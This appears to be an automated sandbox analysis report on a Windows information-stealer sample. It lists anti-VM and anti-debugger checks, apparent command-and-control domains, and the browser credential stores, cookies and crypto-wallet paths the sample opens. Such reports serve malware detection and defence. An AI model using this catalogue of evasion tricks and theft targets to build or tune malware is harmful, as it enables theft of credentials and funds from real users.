                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0DB7 second address: 4AD0DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007FC8BCD07026h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC8BCD0701Ah 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0DEE second address: 4AD0DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0DF4 second address: 4AD0DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0DFA second address: 4AD0DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: 837DB8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: 9DFA2A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: 83502A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: A0AB97 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: 9E9C68 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: 837D0E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSpecial instruction interceptor: First address: A75718 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7700 Thread sleep time: -36018s >= -30000s
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7696 Thread sleep time: -32016s >= -30000s
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7680 Thread sleep time: -38019s >= -30000s
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7788 Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7692 Thread sleep time: -32016s >= -30000s
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe TID: 7676 Thread sleep time: -30015s >= -30000s
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeLast function: Thread delayed
                Source: Amcache.hve.6.drBinary or memory string: VMware
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506364695.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: LP4a6BowQN.exe, 00000000.00000002.1984768326.00000000009C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.6.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054ED000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696492231p
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: LP4a6BowQN.exe, 00000000.00000002.1989902954.0000000000B67000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.6.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: LP4a6BowQN.exe, 00000000.00000002.1984768326.00000000009C0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: LP4a6BowQN.exe, 00000000.00000003.1425463565.00000000054E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: NTICE
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: SICE
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: LP4a6BowQN.exe, 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: steppriflej.xyz
Source: LP4a6BowQN.exe, 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sendypaster.xyz
Source: LP4a6BowQN.exe, 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: cuddlyready.xyz
Source: LP4a6BowQN.exe, 00000000.00000002.1985008061.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: MProgram Manager
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: LP4a6BowQN.exe, 00000000.00000003.1506364695.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506045565.0000000000C13000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506435086.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: LP4a6BowQN.exe PID: 7624, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: /JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wal,h
Source: LP4a6BowQN.exe | String found in binary or memory: %appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0
Source: LP4a6BowQN.exe | String found in binary or memory: Jaxx Liberty
Source: LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: int.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d"
Source: LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: a%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
Source: LP4a6BowQN.exe, 00000000.00000003.1479240445.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Exodus
Source: LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
Source: LP4a6BowQN.exe, 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: LP4a6BowQN.exe, 00000000.00000003.1479240445.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffffla
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\LP4a6BowQN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
